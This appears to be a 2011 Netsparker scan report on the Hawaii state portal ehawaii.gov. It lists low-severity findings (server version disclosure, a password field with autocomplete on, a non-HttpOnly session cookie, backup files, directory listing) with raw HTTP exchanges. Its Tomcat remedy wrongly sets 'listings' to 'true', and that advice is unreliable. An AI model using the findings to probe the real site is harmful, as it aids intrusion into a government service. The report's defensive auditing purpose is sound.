The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /dlnr/fish/exe/fish.cgi

/dlnr/fish/exe/fish.cgi CONFIRMED

https://www.ehawaii.gov/dlnr/fish/exe/fish.cgi

Request

GET /dlnr/fish/exe/fish.cgi HTTP/1.1
Referer: https://www.ehawaii.gov/dlnr/fish/exe/fresh_main_page.cgi
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.ehawaii.gov
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 500 Internal Server Error
Date: Sat, 30 Apr 2011 22:17:21 GMT
Server: Apache/2.2
Last-Modified: Fri, 15 Jan 2010 06:35:02 GMT
ETag: "31f62e-563-47d2e340bd180"
Accept-Ranges: bytes
Content-Length: 1379
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><title>Service Error</title><style type="text/css"><!--body,td,th { font-family: Arial, Helvetica, sans-serif; font-size: 76%; color: #333333;}body { background-color: #FFFFFF; margin-left: 10px; margin-top: 10px; margin-right: 10px; margin-bottom: 10px;}h1,h2,h3,h4,h5,h6 { font-family: Georgia, Times New Roman, Times, serif; font-style: italic;}h1 { font-size: 2em; border-bottom: 1px solid #333333; padding-bottom: 5px;}ul li { line-height: 2.2em; list-style: square;}a:link { color: #0099CC; text-decoration: none;}a:visited { color: #0099CC; text-decoration: none;}a:hover { color: #0099CC; text-decoration: underline;}a:active { color: #0099CC; text-decoration: none;}a { font-weight: bold;}input, select { font-family: Arial, Helvetica, sans-serif; font-size: 1em;}--></style></head><body><a href="http://www.ehawaii.gov"><img src="/error-pages/errorlogo.gif" border="0" /></a><h1>Service Error</h1><p>We're sorry, the service you are using has generated an error and cannot complete your request.</p><p><strong>Please try again later.</strong></p></body></html>
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /efile/

/efile/ CONFIRMED

https://www.ehawaii.gov/efile/

Identified Field Name

PASSWORD

Request

GET /efile/ HTTP/1.1
Referer: https://www.ehawaii.gov/efile
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.ehawaii.gov
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 22:16:28 GMT
Server: Apache
Content-Type: text/html
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><title>Department of Taxation</title><!-- Meta Tags --><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta name="keywords" content="" /><meta name="description" content="" /><!-- Favicon --><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon"><!-- CSS --><link href="css/elf.css" rel="stylesheet" media="" type="text/css" title="default" /><!-- JavaScript --><script language="javascript" type="text/javascript" src="js/jquery-1.2.6.min.js"></script><script language="javascript" type="text/javascript">function clickSubmit(submitId, anchorName, confirmMessage) { var _confirm = true; if (confirmMessage) { if (!confirm(confirmMessage)) { return false; } } var submitBtn = $('#'+submitId); if (submitBtn) { var parentForm = $('form'); var formAction = parentForm.attr('action'); var index = -1; if (anchorName) { if (formAction.indexOf('#') == -1) { parentForm.attr('action', formAction + "#" + anchorName) } else { index = formAction.indexOf('#'); var temp = formAction.substring(0,index); parentForm.attr('action', temp + "#" + anchorName); } } submitBtn.click(); }}</script><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-939376-1");pageTracker._trackPageview();} catch(err) {}</script></head><body><!-- START: Banner --><div id="banner"><div id="title"><a href="http://hawaii.gov/tax"><img src="images/mainBanner-sm.jpg" border="0" alt="department of taxation logo" /></a></div><a href="http://www.hawaii.gov/" class="smwhite">HAWAII.GOV</a><div id="stayconnected"><a href="http://stayconnected.hawaii.gov/"><img src="images/stay_connected.gif" border="0" alt="stay connected logo" /></a></div></div><!-- START: Body --><div id="container" class="clearfix"> <h1>Welcome to the Department of Taxation's Electronic Services site!</h1> <!-- <p class="red">Effective September 2, 2009, an additional $1.00 fee will be added to any tax or bill payment made through the Department of Taxation's Electronic Services website. Filing without a payment is free. The total portal administration fee for payments made via credit card is $1.00 plus 2.25% of the total transaction amount. If you choose to pay via electronic debit to your bank account (eCheck) the portal administration fee is discounted to $1.00. All fees are non-refundable.</p> --> <!-- <p class="red">The Department of Taxation will be shutting down the Electronic Tax Filing site for annual maintenance and deployment for the 2009 form revision, etc. due to tax law changes. The site will be down from 12:00 Midnight, December 31, 2008 until January 2, 2009, 10:00am. We apologize for any inconvenience this may have caused. Thank you and we wish you a SAFE and PROSPEROUS 2009!</p> --> <div class="loginbox"> <span class="big2">Already Registered? Login Here:</span> <form method = "post" action = "https://dotax.ehawaii.gov/efile/user "> <input name="SESSION_ID" type=hidden value=""> <input name="CURRSTATE" type=hidden value="com.hic.dotax.user.gui.Login"> <table width="100%" border="0" cellspacing="0" cellpadding="0" style="margin-top:15px;"> <tr> <td width="125" valign="bottom"><span class="smfont">User ID:<br>(Your SSN or FEIN)</span><br /> <label><input type="text" autocomplete="off" name="SSN" value="" size="12" maxlength="11" title="User Id is your Social Security Number or your Federal Employer Identification Number" class="mediumField" ></label></td> <td width="125" valign="bottom"><span class="smfont">Password:<br>(Case Sensitive)</span><br /> <label><input type="password" name="PASSWORD" value="" size="14" maxlength="12" title="Password, case sensitive" class="mediumField"></label></td> <td valign="bottom"><input id="submitButton" type="submit" name="SUBMIT" value="Login"/></td> </tr> </table> </form> <img src="images/efilelogo.gif" align="right" alt="efile" /> <p><a href="https://dotax.ehawaii.gov/efile/user?redirect=I+Have+Read+the+Requirements" class="smfont">Register Now</a>&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;<a href="https://dotax.ehawaii.gov/efile/user?SUBMIT=Retrieve Password&CURRSTATE=com.hic.dotax.user.gui.Login" class="smfont">Forgot your password?</a></p> </div><!-- .loginbox --> <div class="linkbox"> <ul style="margin-top:75px;"> <li><a href="http://dotax.ehawaii.gov/tls/app">Search the Tax Licenses</a>&nbsp;<img src="images/search.gif" style="vertical-align:middle;" alt="search" /></li> <li><a href="http://www6.hawaii.gov/tax/b1_sdinfo.htm">Software Developers</a></li> </ul> </div><!-- .linkbox --> <div class="clearfix" style="clear:both;"> <div class="infobox clearfix"><img src="images/info-indv.jpg" alt="information for individuals" /><br /><br /><br />Information for<br /><span class="big">Individuals</span></div> <div class="linkbox"> <ul style="margin-top:55px;"> <li><a href="https://dotax.ehawaii.gov/efile/user?redirect=I+Have+Read+the+Requirements">Register for E-File</a></li> <li><a href="http://www6.hawaii.gov/tax/b3_elf.htm">E-File Information</a></li> <li><a href="https://tax.ehawaii.gov/hoihoi/refund.html">Individual Income Tax Refund Status</a></li> <li><a href="http://www6.hawaii.gov/tax/b2_ebiz.htm">Federal / State Income Tax Joint E-Filing (JELF)</a></li> </ul> </div><!-- .linkbox --> </div><!-- clear --> <div class="clearfix" style="clear:both;"> <div class="infobox clearfix"><img src="images/info-bus.jpg" alt="information for businesses" /><br /><br /><br />Information for<br /><span class="big">Businesses</span></div> <div class="linkbox"> <ul style="margin-top:70px;"> <li><a href="https://dotax.ehawaii.gov/efile/user?redirect=I+Have+Read+the+Requirements">Register for E-File</a></li> <li><a href="http://www6.hawaii.gov/tax/b3_elf.htm">E-File Information</a></li> </ul> </div><!-- .linkbox --> </div><!-- clear --> <div class="clearfix" style="clear:both;"> <div class="infobox clearfix"><img src="images/info-taxpro.jpg" alt="information for tax professionals" /><br /><br /><br />Information for<br /><span class="big">Tax Professionals</span></div> <div class="linkbox"> <ul style="margin-top:60px;"> <li><a href="https://dotax.ehawaii.gov/efile/user?redirect=I+Have+Read+the+Requirements">Register for E-File</a></li> <li><a href="http://www6.hawaii.gov/tax/b3_elf.htm">E-File Information</a></li> <li><a href="http://www6.hawaii.gov/tax/ebiz/10pubef2.pdf">Handbook for Electronic Filers (PUB EF-2 PDF)</a></li> </ul> </div><!-- .linkbox --> </div><!-- clear --> <div class="school clear"><a href="http://www6.hawaii.gov/tax/video/a2_b2_4psa_vid_05.htm"><img src="images/efileBanner.jpg"></a></div> </div><!-- START: Footer --><div id="footer"> <ul class="flinks"> <li><a href="http://www.hawaii.gov/tax" title="TAX Home">Department of Taxation Home</a></li> <li>||</li> <li><a href="http://www.hawaii.gov/" title="State Home">State of Hawaii homepage</a></li> <li>||</li> <li><a href="http://www.ehawaii.gov/dakine/docs/terms.html" target="_blank" title="Terms of Use (opens in new window)">Terms of Use</a></li> <li>||</li> <li><a href="http://www.ehawaii.gov/dakine/docs/privacy.html" target="_blank" title="Privacy Policy (opens in new window)">Privacy Policy</a></li> <li>||</li> <li><a href="http://www6.hawaii.gov/tax/a8_contact.htm" title="Contact Tax">Contact Information</a></li> <li>||</li> <li><a href="https://dotax.ehawaii.gov/efile/html/calc.html" title="Calculator">Calculator</a></li> <li>||</li> <li><a href="http://www.ehawaii.gov/dakine/comment.html?applicationId=73" target="_blank" title="Feedback (opens in new window)">Feedback</a></li> <li>||</li> <li><a href="https://dotax.ehawaii.gov/efile/html/FAQ.html" title="Frequently Asked Questions">F.A.Q.</a></li> </ul> <a href="http://www.ehawaii.gov"><img src="images/poweredby.gif" border="0" alt="powered by eHawaii" /></a></div></body></html>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /dakine/

/dakine/ CONFIRMED

http://www.ehawaii.gov/dakine/

Identified Cookie

JSESSIONID

Request

GET /dakine/ HTTP/1.1
Referer: http://www.ehawaii.gov/dakine/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.ehawaii.gov
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 30 Apr 2011 22:16:29 GMT
Server: Apache-Coyote/1.1
Location: http://www.ehawaii.gov/dakine/index.html
Content-Type: text/html
Content-Length: 0
Set-Cookie: JSESSIONID=AFC024A89F6EE30EBBC3C2F5A2D337DC.liona; Path=/dakine
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive


Tomcat Version Disclosure

Tomcat Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is Tomcat. This information was gathered from the HTTP Headers.

Impact

An attacker can look for specific security vulnerabilities for the version disclosed by the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /dakine/css/

/dakine/css/

http://www.ehawaii.gov/dakine/css/

Extracted Version

Apache Tomcat/5.5.20

Request

GET /dakine/css/ HTTP/1.1
Referer: http://www.ehawaii.gov/dakine/css/main.css
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.ehawaii.gov
Cookie: JSESSIONID=8B27D3DD68CA48300DC5C4232C59B6A8.lono
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:16:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 2050


<html>
<head>
<title>Directory Listing For /css/</title>
<STYLE><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></STYLE> </head>
<body><h1>Directory Listing For /css/ - <a href="/dakine/"><b>Up To /</b></a></h1><HR size="1" noshade="noshade"><table width="100%" cellspacing="0" cellpadding="5" align="center">
<tr>
<td align="left"><font size="+1"><strong>Filename</strong></font></td>
<td align="center"><font size="+1"><strong>Size</strong></font></td>
<td align="right"><font size="+1"><strong>Last Modified</strong></font></td>
</tr><tr>
<td align="left">&nbsp;&nbsp;
<a href="/dakine/css/calendar.css"><tt>calendar.css</tt></a></td>
<td align="right"><tt>1.1 kb</tt></td>
<td align="right"><tt>Fri, 01 Jun 2007 22:06:12 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/dakine/css/ie6.css"><tt>ie6.css</tt></a></td>
<td align="right"><tt>0.3 kb</tt></td>
<td align="right"><tt>Wed, 30 May 2007 03:03:48 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/dakine/css/main.css"><tt>main.css</tt></a></td>
<td align="right"><tt>16.8 kb</tt></td>
<td align="right"><tt>Mon, 25 Oct 2010 20:09:02 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/dakine/css/mobile.css"><tt>mobile.css</tt></a></td>
<td align="right"><tt>14.8 kb</tt></td>
<td align="right"><tt>Tue, 29 May 2007 22:44:46 GMT</tt></td>
</tr>
</table>
<HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.20</h3></body>
</html>
Apache Coyote Version Disclosure

Apache Coyote Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing Apache Coyote version in the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can look for specific security vulnerabilities for the version identified in the SERVER header. The attacker can also use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /dakine/

/dakine/

http://www.ehawaii.gov/dakine/

Extracted Version

Apache-Coyote/1.1

Request

GET /dakine/ HTTP/1.1
Referer: http://www.ehawaii.gov/dakine/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.ehawaii.gov
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 30 Apr 2011 22:16:29 GMT
Server: Apache-Coyote/1.1
Location: http://www.ehawaii.gov/dakine/index.html
Content-Type: text/html
Content-Length: 0
Set-Cookie: JSESSIONID=AFC024A89F6EE30EBBC3C2F5A2D337DC.liona; Path=/dakine
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive


[Possible] Backup File Found

[Possible] Backup File Found

2 TOTAL
LOW
Netsparker identified a backup file on the web server.

Impact

Backup files can contain old or current versions of a file on the web server. This could include sensitive data such as password files or even the applications source code. This form of issue normally leads to further vulnerabilities or at worse sensitive information disclosure.

Remedy

Do not store backup files on production servers.
- /doh/vitrec/html/down.html.old

/doh/vitrec/html/down.html.old

https://www.ehawaii.gov/doh/vitrec/html/down.html.old

Request

GET /doh/vitrec/html/down.html.old HTTP/1.1
Referer: https://www.ehawaii.gov/doh/vitrec/html/down.html.old
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.ehawaii.gov
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 22:17:27 GMT
Server: Apache
Last-Modified: Thu, 07 Jun 2007 23:44:38 GMT
ETag: "fce1-6f9-7f6a6580"
Accept-Ranges: bytes
Content-Length: 1785
Content-Type: application/x-trash
Connection: close


<html><head><title>DOH Online Vital Records Ordering || Contact Information</title><LINK rel="stylesheet" href="/doh/vitrec/html/vitrec.css"></head><body bgcolor="#eff7ff"><div align="center"><img src="/doh/vitrec/images/masterbanner.jpg" usemap="#Map" border="0" alt="eHawaiiGov Master Navigation Bar"> <map name="Map"> <area shape="rect" coords="0,2,130,48" href="http://www.ehawaiigov.org" target="_self" alt="Link to eHawaiiGov Home Page" title="Link to eHawaiiGov Home Page"> <area shape="rect" coords="130,1,296,48" href="http://www.ehawaiigov.org/online/html/all_svc.html" alt="State of Hawaii Online Services" title="State of Hawaii Online Services" target="_self"> <area shape="rect" coords="295,1,440,48" href="http://www.ehawaiigov.org/index/" target="_self" alt="Hawaii Information Link Index" title="Hawaii Information Link Index"> </map><img src="/doh/vitrec/images/vitrect_banner.jpg" border="0" alt="DOH Vital Records Banner"><br> <center> <table border="0" cellpadding="0" cellspacing="0" width="750"> <tr> <td align="center" class="subheads"><a href="/doh/vitrec/exe/vitrec.cgi">Home</a> || <a href="/doh/vitrec/html/contact.html">Contact Information</a> || <a href="https://www.ehawaiigov.org/cgi-bin/admin/feedback/exe/feedback.cgi?application_id=40" target="_blank">Feedback</a> || <a href="/doh/vitrec/exe/vitrec.cgi?form_name=disclaimer">Disclaimer</a></td> </tr> </table> <br> <table border="0" cellpadding="0" cellspacing="6" width="650"> <tr><td class="body" align="left">The Online Vital Records Ordering system is down for routine system maintenance. Please return after Saturday, 12:30PM(Hawaii Standard Time). Sorry for the inconvenience. </td></tr> </table> </form> </center></div></body></html>
- /doh/vitrec/html/contact.html.old

/doh/vitrec/html/contact.html.old

https://www.ehawaii.gov/doh/vitrec/html/contact.html.old

Request

GET /doh/vitrec/html/contact.html.old HTTP/1.1
Referer: https://www.ehawaii.gov/doh/vitrec/html/contact.html.old
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.ehawaii.gov
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 22:17:27 GMT
Server: Apache
Last-Modified: Thu, 07 Jun 2007 23:44:38 GMT
ETag: "fcde-961-7f6a6580"
Accept-Ranges: bytes
Content-Length: 2401
Content-Type: application/x-trash
Connection: close


<html><head><title>DOH Online Vital Records Ordering || Contact Information</title><LINK rel="stylesheet" href="/doh/vitrec/html/vitrec.css"></head><body bgcolor="#eff7ff"><div align="center"><img src="/doh/vitrec/images/masterbanner.jpg" usemap="#Map" border="0" alt="eHawaiiGov Master Navigation Bar"> <map name="Map"> <area shape="rect" coords="0,2,130,48" href="http://www.ehawaiigov.org" target="_self" alt="Link to eHawaiiGov Home Page" title="Link to eHawaiiGov Home Page"> <area shape="rect" coords="130,1,296,48" href="http://www.ehawaiigov.org/online/html/all_svc.html" alt="State of Hawaii Online Services" title="State of Hawaii Online Services" target="_self"> <area shape="rect" coords="295,1,440,48" href="http://www.ehawaiigov.org/index/" target="_self" alt="Hawaii Information Link Index" title="Hawaii Information Link Index"> </map><img src="/doh/vitrec/images/vitrect_banner.jpg" border="0" alt="DOH Vital Records Banner"><br> <center> <table border="0" cellpadding="0" cellspacing="0" width="750"> <tr> <td align="center" class="subheads"><a href="/doh/vitrec/exe/vitrec.cgi">Home</a> || <a href="/doh/vitrec/html/contact.html">Contact Information</a> || <a href="http://www.ehawaiigov.org/cgi-bin/admin/feedback/exe/feedback.cgi?application_id=40" target="_blank">Feedback</a> || <a href="/doh/vitrec/exe/vitrec.cgi?form_name=disclaimer">Disclaimer</a></td> </tr> </table> <br> <table border="0" cellpadding="0" cellspacing="6" width="650"> <tr><td class="heads" align="center"> CONTACT INFORMATION </td></tr> <tr><td class="heads" align="center">&nbsp; </td></tr> <tr><td class="body" align="left"> If you have any questions about the State of Hawaii Department of Health, please <a href="mailto:vr-info@mail.health.state.hi.us">e-mail</a> us or call (808)586-4400 or (808)586-4442. </td></tr> <tr><td class="body" align="left"> Information on issuance of certified copies of vital records, Apostiles, amendment of vital records, new birth certificates (for adopted persons, etc.), and late registration may also be obtained via the telephone system, any day or any time, by calling (808)586-4533. To send an e-mail message, click on <a href="mailto:vr-info@mail.health.state.hi.us">vr-info@mail.health.state.hi.us</a>. </td></tr> </table> </form> </center></div></body></html>
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /efile/images/

/efile/images/ CONFIRMED

https://www.ehawaii.gov/efile/images/

Request

GET /efile/images/ HTTP/1.1
Referer: https://www.ehawaii.gov/efile/images/favicon.ico
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.ehawaii.gov
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Date: Sat, 30 Apr 2011 22:16:29 GMT
Server: Apache/2.2
Last-Modified: Fri, 15 Jan 2010 06:35:02 GMT
ETag: "31f630-b9b-47d2e340bd180"
Accept-Ranges: bytes
Content-Length: 2971
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><title>Page Not Found</title><style type="text/css"><!--body,td,th { font-family: Arial, Helvetica, sans-serif; font-size: 76%; color: #333333;}body { background-color: #FFFFFF; margin-left: 10px; margin-top: 10px; margin-right: 10px; margin-bottom: 10px;}h1,h2,h3,h4,h5,h6 { font-family: Georgia, Times New Roman, Times, serif; font-style: italic;}h1 { font-size: 2em; border-bottom: 1px solid #333333; padding-bottom: 5px;}ul li { line-height: 2.2em; list-style: square;}a:link { color: #0099CC; text-decoration: none;}a:visited { color: #0099CC; text-decoration: none;}a:hover { color: #0099CC; text-decoration: underline;}a:active { color: #0099CC; text-decoration: none;}a { font-weight: bold;}input, select { font-family: Arial, Helvetica, sans-serif; font-size: 1em;}--></style></head><body><a href="http://www.ehawaii.gov/"><img src="/error-pages/errorlogo.gif" border="0" /></a><h1>Page Not Found</h1><p>We're sorry, the page you are looking for has been moved or deleted.</p><p><strong>Please try the following:</strong></p><ul> <li>Check that the page address is spelled correctly and uses the appropriate letter case.</li> <li>Search to find what you are looking for: <form action="https://www.ehawaii.gov/dakine/search.html" method="get"><input id="searchText" name="q" type="text" size="25" align="absmiddle" value="" style="width:200px;"/><input type="hidden"name="searchby" value="tag" /><input type="hidden" name="cx" value="012249442604008016873:fyi5sijjiuo" /><input type="hidden" name="cof" value="FORID:9" />&nbsp;<input name="sa" type="submit" class="subhbutton" value="Search" align="absmiddle" /></form> </li> <li>View the <a href="http://www.ehawaii.gov/dakine/docs/allservices.html">list of our services</a></li> <li><!-- BEGIN ProvideSupport.com Text Chat Link Code --><div id="ciNjc9" style="z-index:100;position:absolute"></div><div id="scNjc9" style="display:inline"></div><div id="sdNjc9" style="display:none"></div><script type="text/javascript">var seNjc9=document.createElement("script");seNjc9.type="text/javascript";var seNjc9s=(location.protocol.indexOf("https")==0?"https://secure.providesupport.com/image":"http://image.providesupport.com")+"/js/hic/safe-textlink.js?ps_h=Njc9\u0026ps_t="+new Date().getTime()+"\u0026online-link-html=Live%20Chat%20Help\u0026offline-link-html=Live%20Chat%20Help";setTimeout("seNjc9.src=seNjc9s;document.getElementById('sdNjc9').appendChild(seNjc9)",1)</script><noscript><div style="display:inline"><a href="http://www.providesupport.com?messenger=hic">Customer Support Chat</a></div></noscript><!-- END ProvideSupport.com Text Chat Link Code --></li></ul></body></html>
Directory Listing (Tomcat)

Directory Listing (Tomcat)

1 TOTAL
INFORMATION
Web server responded with a list of files located in the target directory.

Impact

An attacker can see a list of files located in the directory and download files which disclose sensitive information.

Actions to Take

  1. See the remedy for solution.
  2. Configure the webserver to disallow directory listing requests
  3. Ensure that all current security patches have been applied to the web server.

Remedy

Apply the following configuration to your web.xml for securing your Tomcat installation against directory listing attacks :
<init-param>
        <param-name>listings</param-name>
        <param-value>true</param-value>
</init-param>

External References

Remedy References

- /dakine/css/

/dakine/css/

http://www.ehawaii.gov/dakine/css/

Request

GET /dakine/css/ HTTP/1.1
Referer: http://www.ehawaii.gov/dakine/css/main.css
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.ehawaii.gov
Cookie: JSESSIONID=8B27D3DD68CA48300DC5C4232C59B6A8.lono
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:16:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 2050


<html>
<head>
<title>Directory Listing For /css/</title>
<STYLE><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></STYLE> </head>
<body><h1>Directory Listing For /css/ - <a href="/dakine/"><b>Up To /</b></a></h1><HR size="1" noshade="noshade"><table width="100%" cellspacing="0" cellpadding="5" align="center">
<tr>
<td align="left"><font size="+1"><strong>Filename</strong></font></td>
<td align="center"><font size="+1"><strong>Size</strong></font></td>
<td align="right"><font size="+1"><strong>Last Modified</strong></font></td>
</tr><tr>
<td align="left">&nbsp;&nbsp;
<a href="/dakine/css/calendar.css"><tt>calendar.css</tt></a></td>
<td align="right"><tt>1.1 kb</tt></td>
<td align="right"><tt>Fri, 01 Jun 2007 22:06:12 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/dakine/css/ie6.css"><tt>ie6.css</tt></a></td>
<td align="right"><tt>0.3 kb</tt></td>
<td align="right"><tt>Wed, 30 May 2007 03:03:48 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/dakine/css/main.css"><tt>main.css</tt></a></td>
<td align="right"><tt>16.8 kb</tt></td>
<td align="right"><tt>Mon, 25 Oct 2010 20:09:02 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/dakine/css/mobile.css"><tt>mobile.css</tt></a></td>
<td align="right"><tt>14.8 kb</tt></td>
<td align="right"><tt>Tue, 29 May 2007 22:44:46 GMT</tt></td>
</tr>
</table>
<HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.20</h3></body>
</html>
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

